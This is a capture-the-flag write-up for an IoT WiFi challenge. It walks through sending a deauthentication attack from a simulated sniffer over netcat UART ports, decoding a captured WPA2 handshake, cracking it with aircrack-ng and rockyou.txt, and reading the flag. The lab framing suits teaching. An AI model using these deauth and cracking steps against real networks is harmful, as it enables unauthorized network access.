# Cr4cK_W1F1

| Field | Value |
|-------|-------|
| Category | IoT |
| Difficulty | Medium |
| Points | TBD |
| Author | Eun0us |
| CTF | Espilon 2026 |

---

## Description

You recover a UART access on a red team WiFi sniffer tool.
Analyze the captured data to recover the WiFi password, then connect to the network and
retrieve the flag.

- TX (read UART): port 1111
- RX (write UART): port 2222

---

## TL;DR

Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART
output (base64-encoded), crack the handshake with `aircrack-ng` and `rockyou.txt` to find
the passphrase `sunshine`, then connect and read the flag.

---

## Tools

| Tool | Purpose |
|------|---------|
| `nc` | Connect to UART TX/RX ports |
| `base64` | Decode the PCAP blob |
| `aircrack-ng` | Crack WPA2 handshake |
| `rockyou.txt` | Password wordlist |

---

## Solution
![hashcat cracking WPA handshake](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/wifi_crack.png)


### Step 1 — Open both UART channels

```bash
# Terminal 1 — TX (read output)
nc <host> 1111

# Terminal 2 — RX (send commands)
nc <host> 2222
```

![two terminals showing TX output and RX prompt](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/wifi_terminals.png)

### Step 2 — Start the sniffer and force a deauth

In the RX terminal:

```text
sniffer start
deauth TestNet 02:00:00:aa:00:01
sniffer stop
```

The deauthentication forces the target client to reconnect and redo the WPA2 4-way handshake.

### Step 3 — Extract the PCAP from TX

On the TX terminal, output appears between markers:

```text
PCAP_BASE64_BEGIN
<base64 data>
PCAP_BASE64_END
```

Copy the base64 lines to a file and decode:

```bash
base64 -d handshake.b64 > handshake.pcap
```

![TX output showing the PCAP_BASE64 markers](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/wifi_pcap.png)

### Step 4 — Crack the WPA2 handshake

```bash
aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
```

Output:

```
KEY FOUND! [ sunshine ]
```

![aircrack-ng finding the key](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/wifi_aircrack.png)

### Step 5 — Connect and read the flag

In the RX terminal:

```text
connect TestNet sunshine
cat /flag.txt
```

![RX terminal returning the flag after connecting to the network](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/wifi_flag_rx.png)

---

## Flag

`CTF{CR4CK_W1F1_EXAMPLE}`

> Note: This challenge was still being finalized at time of writing. The flag above is
> a placeholder; the real flag will be updated before deployment.